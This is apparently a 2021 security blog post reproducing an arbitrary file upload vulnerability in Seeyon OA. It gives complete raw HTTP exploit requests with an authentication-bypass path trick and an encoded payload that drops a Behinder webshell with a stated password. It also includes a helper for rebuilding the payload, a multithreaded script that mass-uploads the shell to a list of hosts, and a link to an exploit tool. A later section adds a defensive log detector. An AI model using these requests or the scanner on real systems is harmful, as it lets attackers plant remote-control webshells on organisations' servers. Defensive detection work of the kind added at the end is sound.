Seeyon OA (致远OA) arbitrary file upload

Author: print("")  Category: web security, vulnerability reproduction  Published: 2021-01-08 21:19

Old version (two requests: the first writes the file through /seeyon/pdfservlet with a DBSTEP body; the second, reached through the autoinstall.do/../ path prefix, renames it to upload.jsp with method=uploadMenuIcon)

POST /seeyon/pdfservlet HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=04C25979C4EA3AF182B9F96F6F080198;
Host: xxxxxxx:808
Content-type: application/x-www-form-urlencoded
Content-Length: 388
Connection: close


DBSTEP V3.0     330             0               104             DBSTEP=OKMLlKlV
OPTION=S3WYOSyMLKS6
newPdfFileId=wV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
aaaa



POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=04C25979C4EA3AF182B9F96F6F080198;
Host: xxxxx:808
Content-type: application/x-www-form-urlencoded
Content-Length: 50
Connection: close


method=uploadMenuIcon&fileid=1&filename=upload.jsp

New version (a single POST to ajax.do with managerName=formulaManager and requestCompress=gzip, reached through the autoinstall.do.css/..;/ path prefix; the gzip-compressed upload is carried in the arguments parameter)

POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
Host: xxxxxx
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=04C25979C4EA3AF182B9F96F6F080198; UM_distinctid=17490a07027c4d-030a052b247d49-31697004-13c680-17490a07028c60; loginPageURL=""
Content-Type: application/x-www-form-urlencoded
Content-Length: 3562


managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BC%7E%C2%98%26e%C3%A7%C3%A1%27%3As%C3%B7%24%0D%3C%C2%8CkWvbr%03%C2%B3%C2%A4r%C2%B91%2B-%C2%83%C3%8C%15%C2%85%C3%9B%C2%96%C3%942%169K%C2%95%05%C2%B3%C2%B8XsI%00%C3%89%3C%07%C2%BC%C2%9E%C2%AF%C2%89R%C2%B8%C3%9AX%3E%0E%5E%C2%8A%C2%A3%C2%B8%C2%88lM%C3%B2%21%C3%91%2B%C3%80%C3%A1%C3%82%0DY%C2%B4%C3%91%C2%86%C2%95%14%0E%C2%9F%C2%9DH%C2%B9n%C2%89%C2%9A%00%C2%A2%C2%87P%C3%84%C2%9C%C2%AD%09W%C3%8B%C2%80X%12q%06%C3%84q%05k%7C%C2%B2%C3%A0%2CM%18%C3%90%C3%B7t%C2%8D%C3%A2%C2%B4%C3%A1M%3F%C2%B7%C3%B8%C2%95%00%C2%96j%C3%B1%C2%A9%C2%8C%C3%A2%C3%9A%C3%86%26%C2%97%C2%91T%C3%AC%C3%82%C3%B2%1F%C3%80%C2%BF%7C%C2%B3E%3Dt%C3%85Ee%C2%99j%C3%A2r%C3%83GITR%C3%8BTn%C3%92%C3%A2%C3%A8%C3%9Bf%C3%80%C3%9A%C2%86p%06%C3%95dFun%C2%80-%0B%C3%8BP1%C2%882%5D%C2%9E%C2%B7z%07q%1CP%C2%8CJ%127%C2%89%C3%87%2B%03%40i%C2%99%C3%92%5B%7Ep%C2%85%C3%86*u%C2%8C%C2%8D%C2%BF%C3%A7%C3%8A%00%C3%B0%1B%C3%9F%C2%AE%02%C3%A4%C2%99*%C2%96%16%19%C2%B4%10%1E%C3%91%C3%B8Xh%C2%AEri%C3%99%C3%9A%C2%AD%C2%89%C2%8Am%C2%82s%C3%BB%C3%98b%C3%8B%C2%A2%C2%94n%C2%A6%25Z%C2%93%12%C2%BB%04%C2%B2%C3%8E%C3%B4%3C%3A%C2%99%C3%AC3%C3%8Di%C2%9D%C3%B7%C2%B3m%C3%94z%C2%AB%C2%80%C3%A6%C2%80%C3%A6%C3%AF%C2%9E%C2%B7H%09%01%C3%81W%28%C2%96%18%C3%8E%C2%84%03%5C%C2%AE%12%C2%97%00%C3%9F%C2%B9%C2%B1%C3%88%3E%C3%AC%07%C3%B6aSm%0D%1B%5B%C2%A1%7E%C3%9E%1E%C2%A4%C2%81%C2%85%C2%A4%11%C3%A0%C3%B4%5BS%03%24%5C%C2%A1%C2%A9%1A%C2%96Q%0El%C3%8DGP%C2%93R%C2%A7%3A%C2%8F%C3%B6%1C%C2%BE%3Am%C2%8C%C3%A37zM+%C2%86sL%C3%AB%C2%AA%06.Q%C2%B0%3C%5DMT%7D%C2%83%C3%A4C%16%C2%AEi%0C%C2%8E%C2%B9%C2%8F7%C2%A8%C3%8Cm%13%C3%B8GN%0F%C3%ABX5N%17%C2%8E%C3%BC%04%5B%C2%95%1F%7F%C3%B83%C2%B2%7F%C3%BD3%C2%91%2B%09%C3%89Z%23%C2%9F%C3%96%C3%B9%02%C2%95%C2%9F%C2%AC%C3%9F%C3%B0%C2%B5%C3%B3%C3%88%25%3AO%C3%AB%13C1H%40%C3%95%C3%A8%C2%B5%C3%B5%C2%A9%C3%B5%1A%C2%BF%7E%C2%AD%C2%8D%3C%3DS9%C2%88%C2%ADJ8%C2%BB%C2%ACM%C3%B3%C2%B1HeQ%C3%80%C2%B0%C2%9A%C3%9C%C2%A01%C3%8C%5D%03%C3%9F%C3%A8%C3%9Bt%C2%AF%2B%0B%25T%C3%A74%C2%AF%C3%85%C3%9D.o%C3%BA%C2%83S%C3%B1%3E%C3%92%C2%89M%7BU%5E%C2%AE00u%0C%C3%B8%7Dns%3A%7B%24%C3%BA%C3%9B%1F9%C2%A8i%3A%C2%BC.9%C3%86%C3%94%C3%8F%C2%84%C3%86%40%C3%A3%C2%87%2B7RX%C3%8B%10B%1A%1F%C3%B5C%2F%C2%A1%C2%B1HA%154%3D%C2%BD%C3%A7%C3%869%14%C3%B5%21%C2%A4%C2%B5%C3%9DM%C3%87MO%02N%C2%A9%1Cs%C3%82%C2%BA%C2%A2%C3%8E%C3%AE%C3%82k%C3%91%C3%96uU%C2%B8%C3%BC%C3%BE%C3%B1%7D%C3%98%C2%994%C2%8F%C3%BA%04%C2%A5%C2%A0%3Fy%C3%91%C3%A6%C3%9F%C2%863%0F%C3%84%C2%90%C3%8E%3B%C2%BC%C3%9F%C3%AD%C2%A8%7F%C2%AE%C3%94%C3%BB%C3%AFT%C2%B7fw%C2%A6%C2%B5m%C2%99%C3%9E%1D%C2%B0%C3%9F%C3%9E%C2%93%C3%BCt%C2%A2%00%C3%8D%12x%C3%B8%C3%929%1E%16_%C2%9F%3F.%C2%89%C2%8F%C3%AB%C2%A6%C3%9F08%C3%AA%7D%04%C3%BF%3F%5D%C2%80%C3%A3%C3%94%C2%A3%C2%8E%C3%BD%C3%B8%5E%C2%AFCJ%40%C3%AF%C3%84%C2%A4%C2%99%C2%93%21%C3%80%C2%94e%C3%99%7Bx%C3%AD%C3%BE%C2%A0%3B%C2%92%C3%AE%C3%89%C3%97%C3%BA%C3%8E.%C2%B9%C3%97%C3%BD%C3%BB_%C2%83%C2%B9ok%5E%05%00%00

Dropped shell: http://xxxx0//seeyon/SeeyonUpdate.jspx (Behinder / 冰蝎 3, connection password rebeyond)
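The arguments value in the new-version request starts with %1F%C2%8B%08, which is the gzip magic 1F 8B 08 with the 0x8B byte sent as its UTF-8 form (%C2%8B): the raw gzip stream was treated as text and form-encoded, which is what Java's URLEncoder produces, and requestCompress=gzip asks the server to decompress it again. The helper below is an added example, not the author's code or Seeyon's; it reproduces that encoding and its inverse so the page's payload can be inspected or rebuilt from different raw bytes. It assumes the server reverses exactly this (form-decode the value, take its single-byte form, gunzip), which the page does not show. Python escapes `*` and leaves `~` unescaped where URLEncoder does the opposite; safe='*' removes the first difference and the second is harmless after decoding.

```python
import gzip
import urllib.parse


def encode_arguments(raw: bytes) -> str:
    """gzip raw bytes and form-encode the stream the way the page's payload is encoded:
    every byte >= 0x80 appears as its UTF-8 form (0x8B -> %C2%8B), space becomes '+',
    and alphanumerics plus '.-*_' stay literal (same table as Java's URLEncoder)."""
    gz = gzip.compress(raw, mtime=0)            # mtime=0 keeps the 10-byte header deterministic
    as_text = gz.decode("latin-1")              # one char per byte, U+0000..U+00FF
    return urllib.parse.quote_plus(as_text, safe="*")   # quote_plus UTF-8-encodes chars >= 0x80


def decode_arguments(encoded: str) -> bytes:
    """Inverse: form-decode ('+' is a space, %XX sequences are UTF-8), map each char
    back to one byte, then gunzip. Raises OSError/ValueError on a corrupt stream."""
    as_text = urllib.parse.unquote_plus(encoded)
    gz = as_text.encode("latin-1")
    return gzip.decompress(gz)


def build_body(raw: bytes) -> str:
    """Full application/x-www-form-urlencoded body in the shape of the request above."""
    return "managerMethod=validate&arguments=" + encode_arguments(raw)


if __name__ == "__main__":
    # Constructed sample input: any byte string round-trips, including NUL and high bytes.
    sample = bytes(range(256))
    body = build_body(sample)
    print(body[:48])                           # managerMethod=validate&arguments=%1F%C2%8B%08...
    assert decode_arguments(body.split("arguments=", 1)[1]) == sample
```

To see what the request above actually carries, pass everything after `arguments=` from that request to decode_arguments; the page's value contains literal `+` characters, which is why the decoder uses unquote_plus rather than unquote.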

Python script

#coding:utf-8
import re
import sys
import queue
import threading
import time
import requests

requests.packages.urllib3.disable_warnings()

webqueue = queue.Queue()
mutex = threading.Lock()   # guards GOODURL, which many threads append to
GOODURL = []

VUL_PATH = "/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip"
SHELL_PATH = "/seeyon/SeeyonUpdate.jspx"

HEADERS = {
    'Connection': 'close',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate, sdch, br',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    "Content-Type": "application/x-www-form-urlencoded",
}

# The request body from the "new version" request above. It is written as two
# adjacent string literals (Python concatenates them) so that no newline lands
# inside the body; a newline in the middle would corrupt the gzip stream.
PAYLOAD = (
    "managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BC%7E%C2%98%26e%C3%A7%C3%A1%27%3As%C3%B7%24%0D%3C%C2%8CkWvbr%03%C2%B3%C2%A4r%C2%B91%2B-%C2%83%C3%8C%15%C2%85%C3%9B%C2%96%C3%942%169K%C2%95%05%C2%B3%C2%B8XsI%00%C3%89%3C%07%C2%BC%C2%9E%C2%AF%C2%89R%C2%B8%C3%9AX%3E%0E%5E%C2%8A%C2%A3%C2%B8%C2%88lM%C3%B2%21%C3%91%2B%C3%80%C3%A1%C3%82%0DY%C2%B4%C3%91%C2%86%C2%95%14%0E%C2%9F%C2%9DH%C2%B9n%C2%89%C2%9A%00%C2%A2%C2%87P%C3%84%C2%9C%C2%AD%09W%C3%8B%C2%80X%12q%06%C3%84q%05k%7C%C2%B2%C3%A0%2CM%18%C3%90%C3%B7t%C2%8D%C3%A2%C2%B4%C3%A1M%3F%C2%B7%C3%B8%C2%95%00%C2%96j%C3%B1%C2%A9%C2%8C%C3%A2%C3%9A%C3%86%26%C2%97%C2%91T%C3%AC%C3%82%C3%B2%1F%C3%80%C2%BF%7C%C2%B3E%3Dt%C3%85Ee%C2%99j%C3%A2r%C3%83GITR%C3%8BTn%C3%92%C3%A2%C3%A8%C3%9Bf%C3%80%C3%9A%C2%86p%06%C3%95dFun%C2%80-%0B%C3%8BP1%C2%882%5D%C2%9E%C2%B7z%07q%1CP%C2%8CJ%127%C2%89%C3%87%2B%03%40i%C2%99%C3%92%5B%7Ep%C2%85%C3%86*u%C2%8C%C2%8D%C2%BF%C3%A7%C3%8A%00%C3%B0%1B%C3%9F%C2%AE%02%C3%A4%C2%99*%C2%96%16%19%C2%B4%10%1E%C3%91%C3%B8Xh%C2%AEri%C3%99%C3%9A%C2%AD%C2%89%C2%8Am%C2%82s%C3%BB%C3%98b%C3%8B%C2%A2%C2%94n%C2%A6%25Z%C2%93%12%C2%BB%04%C2%B2%C3%8E%C3%B4%3C%3A%C2%99%C3%AC3%C3%8Di%C2%9D%C3%B7%C2%B3m%C3%94z%C2%AB%C2%80%C3%A6%C2%80%C3%A6%C3%AF%C2%9E%C2%B7H%09%01%C3%81W%28%C2%96%18%C3%8E%C2%84%03%5C%C2%AE%12%C2%97%00%C3%9F%C2%B9%C2%B1%C3%88%3E%C3%AC"
    "%07%C3%B6aSm%0D%1B%5B%C2%A1%7E%C3%9E%1E%C2%A4%C2%81%C2%85%C2%A4%11%C3%A0%C3%B4%5BS%03%24%5C%C2%A1%C2%A9%1A%C2%96Q%0El%C3%8DGP%C2%93R%C2%A7%3A%C2%8F%C3%B6%1C%C2%BE%3Am%C2%8C%C3%A37zM+%C2%86sL%C3%AB%C2%AA%06.Q%C2%B0%3C%5DMT%7D%C2%83%C3%A4C%16%C2%AEi%0C%C2%8E%C2%B9%C2%8F7%C2%A8%C3%8Cm%13%C3%B8GN%0F%C3%ABX5N%17%C2%8E%C3%BC%04%5B%C2%95%1F%7F%C3%B83%C2%B2%7F%C3%BD3%C2%91%2B%09%C3%89Z%23%C2%9F%C3%96%C3%B9%02%C2%95%C2%9F%C2%AC%C3%9F%C3%B0%C2%B5%C3%B3%C3%88%25%3AO%C3%AB%13C1H%40%C3%95%C3%A8%C2%B5%C3%B5%C2%A9%C3%B5%1A%C2%BF%7E%C2%AD%C2%8D%3C%3DS9%C2%88%C2%ADJ8%C2%BB%C2%ACM%C3%B3%C2%B1HeQ%C3%80%C2%B0%C2%9A%C3%9C%C2%A01%C3%8C%5D%03%C3%9F%C3%A8%C3%9Bt%C2%AF%2B%0B%25T%C3%A74%C2%AF%C3%85%C3%9D.o%C3%BA%C2%83S%C3%B1%3E%C3%92%C2%89M%7BU%5E%C2%AE00u%0C%C3%B8%7Dns%3A%7B%24%C3%BA%C3%9B%1F9%C2%A8i%3A%C2%BC.9%C3%86%C3%94%C3%8F%C2%84%C3%86%40%C3%A3%C2%87%2B7RX%C3%8B%10B%1A%1F%C3%B5C%2F%C2%A1%C2%B1HA%154%3D%C2%BD%C3%A7%C3%869%14%C3%B5%21%C2%A4%C2%B5%C3%9DM%C3%87MO%02N%C2%A9%1Cs%C3%82%C2%BA%C2%A2%C3%8E%C3%AE%C3%82k%C3%91%C3%96uU%C2%B8%C3%BC%C3%BE%C3%B1%7D%C3%98%C2%994%C2%8F%C3%BA%04%C2%A5%C2%A0%3Fy%C3%91%C3%A6%C3%9F%C2%863%0F%C3%84%C2%90%C3%8E%3B%C2%BC%C3%9F%C3%AD%C2%A8%7F%C2%AE%C3%94%C3%BB%C3%AFT%C2%B7fw%C2%A6%C2%B5m%C2%99%C3%9E%1D%C2%B0%C3%9F%C3%9E%C2%93%C3%BCt%C2%A2%00%C3%8D%12x%C3%B8%C3%929%1E%16_%C2%9F%3F.%C2%89%C2%8F%C3%AB%C2%A6%C3%9F08%C3%AA%7D%04%C3%BF%3F%5D%C2%80%C3%A3%C3%94%C2%A3%C2%8E%C3%BD%C3%B8%5E%C2%AFCJ%40%C3%AF%C3%84%C2%A4%C2%99%C2%93%21%C3%80%C2%94e%C3%99%7Bx%C3%AD%C3%BE%C2%A0%3B%C2%92%C3%AE%C3%89%C3%97%C3%BA%C3%8E.%C2%B9%C3%97%C3%BD%C3%BB_%C2%83%C2%B9ok%5E%05%00%00"
)


class HttpScan(threading.Thread):
    def __init__(self, q):
        threading.Thread.__init__(self)
        self._queue = q

    def check(self, url, proxy=None, timeout=20):
        # To watch the traffic in Burp, pass
        # proxy={'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}.
        if "://" not in url:
            url = "http://{}".format(url)
        vul = url + VUL_PATH
        try:
            req = requests.get(url, headers=HEADERS, proxies=proxy, timeout=timeout, verify=False)
        except Exception as e:
            print(url, e)
            return
        print(vul, req.status_code)
        if req.status_code == 404:
            return
        # Send the upload through the autoinstall.do.css/..;/ prefix.
        try:
            requests.post(vul, headers=HEADERS, data=PAYLOAD, proxies=proxy, timeout=timeout, verify=False)
        except Exception as e:
            print(url, e)
        # Then check whether the dropped file is reachable.
        try:
            shellurl = url + SHELL_PATH
            req = requests.get(shellurl, headers=HEADERS, proxies=proxy, timeout=timeout, verify=False)
            print(shellurl, req.status_code)
            if req.status_code != 404:
                with mutex:
                    GOODURL.append(shellurl)
        except Exception as e:
            print(url, e)

    def run(self):
        while True:
            try:
                queue_task = self._queue.get(timeout=0.5)
            except queue.Empty:
                break
            self.check(queue_task.strip())
            time.sleep(0.01)


def run_http(webqueue, threadNum=100):
    threads = [HttpScan(webqueue) for _ in range(threadNum)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()


def load_urls(filename):
    """Read one host per line and reduce each to scheme://host[:port]."""
    urls = []
    with open(filename, "r") as f:
        for url in f:
            url = url.strip()
            if not url:
                continue
            if "://" not in url:
                url = "http://{}".format(url)
            # ':' is included so a port such as :808 survives.
            url = re.findall(r'https?://(?:[-\w.:]|(?:%[\da-fA-F]{2}))+', url)[0]
            urls.append(url)
    return list(set(urls))


def main():
    if len(sys.argv) == 2:
        # python seeyon.py url.txt
        for url in load_urls(sys.argv[1]):
            if len(url) > 5:
                webqueue.put(url)
    else:
        url = "http://xxxxx"
        webqueue.put(url)
        print(url)
    run_http(webqueue)
    for u in GOODURL:
        print("[+]", u)


if __name__ == "__main__":
    main()
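Both versions above reach an authenticated handler by putting autoinstall.do in front of a traversal segment (`/../` in the old version, Tomcat's `/..;/` after a fake `.css` suffix in the new one), and the new version is recognisable by its query string. The detector below is an added example, not part of the original post: it runs those three indicators over constructed combined-format access-log lines (the lines are made up for this example, not from a real system) and groups findings per client so a bypass followed by a shell fetch stands out. The shell name is only what this post's payload happened to use, so the third rule is a post-hoc indicator rather than a reliable one.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (Apache/Tomcat combined format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jan/2021:21:10:01 +0800] "POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [08/Jan/2021:21:10:03 +0800] "POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1" 200 128 "-" "Opera/9.80"
10.0.0.5 - - [08/Jan/2021:21:10:04 +0800] "GET /seeyon/SeeyonUpdate.jspx HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [08/Jan/2021:21:11:00 +0800] "GET /seeyon/main.do HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [08/Jan/2021:21:11:05 +0800] "POST /seeyon/ajax.do?method=ajaxAction&managerName=formulaManager HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# autoinstall.do, optionally followed by a bogus suffix such as .css, then "/.." and
# either ";" (Tomcat path parameter) or "/" (plain traversal).
BYPASS_RE = re.compile(r'/autoinstall\.do[^/]*/\.\.(;|/)')


def classify(method, target):
    """Return the list of findings for one request line (empty list if benign)."""
    findings = []
    path, _, query = target.partition("?")
    lower = unquote(path).lower()     # also catches %2e%2e and %3b spellings
    qlower = query.lower()
    if BYPASS_RE.search(lower):
        findings.append("auth-bypass: autoinstall.do traversal prefix")
    if (lower.endswith("/ajax.do") and "managername=formulamanager" in qlower
            and "requestcompress=gzip" in qlower):
        findings.append("upload: formulaManager ajaxAction with requestCompress=gzip")
    if method == "GET" and lower.endswith("/seeyon/seeyonupdate.jspx"):
        findings.append("webshell: SeeyonUpdate.jspx requested")
    return findings


def scan(log_text):
    """Parse each line and keep only the ones with findings: (ip, method, target, findings)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(m["method"], m["target"])
        if findings:
            hits.append((m["ip"], m["method"], m["target"], findings))
    return hits


def correlate(hits):
    """Map each client IP to the set of finding categories it triggered."""
    by_ip = {}
    for ip, _, _, findings in hits:
        by_ip.setdefault(ip, set()).update(f.split(":")[0] for f in findings)
    return by_ip


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for ip, method, target, findings in hits:
        print(ip, method, target, findings)
    print(correlate(hits))   # {'10.0.0.5': {'auth-bypass', 'upload', 'webshell'}}
```

The last sample line shows why the query-string rule is narrow: an ordinary formulaManager call without requestCompress=gzip and without the prefix trick is left alone, so the rule can run on a busy Seeyon instance without flagging normal use.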

Jar exploitation tool

https://www.o2oxy.cn/wp-content/uploads/2021/01/2021-01.rar
